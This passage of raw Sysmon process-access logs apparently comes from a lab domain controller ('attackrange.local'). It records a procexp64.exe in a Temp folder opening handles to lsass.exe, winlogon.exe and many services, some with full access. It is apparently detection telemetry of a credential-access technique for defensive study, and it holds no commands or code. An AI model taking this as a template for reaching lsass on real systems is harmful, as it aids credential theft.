sers\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792259Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792258Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792257Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792256Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792255Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792254Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792253Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792252Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792251Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792250Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792249Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792248Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792247Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792246Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792245Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792244Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792243Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792242Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792241Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792240Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792239Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792238Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792237Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792236Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792235Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792234Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792233Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 